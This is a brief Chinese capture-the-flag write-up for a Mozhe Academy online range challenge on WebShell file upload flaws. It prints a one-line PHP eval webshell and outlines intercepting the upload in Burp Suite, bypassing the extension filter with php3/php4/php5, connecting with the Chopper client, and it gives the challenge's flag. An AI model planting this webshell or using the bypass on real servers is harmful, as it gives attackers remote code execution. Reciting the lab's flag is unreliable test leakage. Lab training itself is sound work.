题目地址:WebShell文件上传漏洞分析溯源(第1题)_文件上传_在线靶场_墨者学院_专注于网络安全人才培养
一句话木马文件
<?php eval(@$_POST['123456']);?>
接下来使用burpsite
1、设置代理
2、配置burpsite 代理
抓包 ctrl +r
然后我们修改数据包
php3、php4、php5 都可以
/// 我们也可以直接 直接上传 不需要抓包
菜刀连接
得到key mozhea759f80aee8b7202a53038f5728*/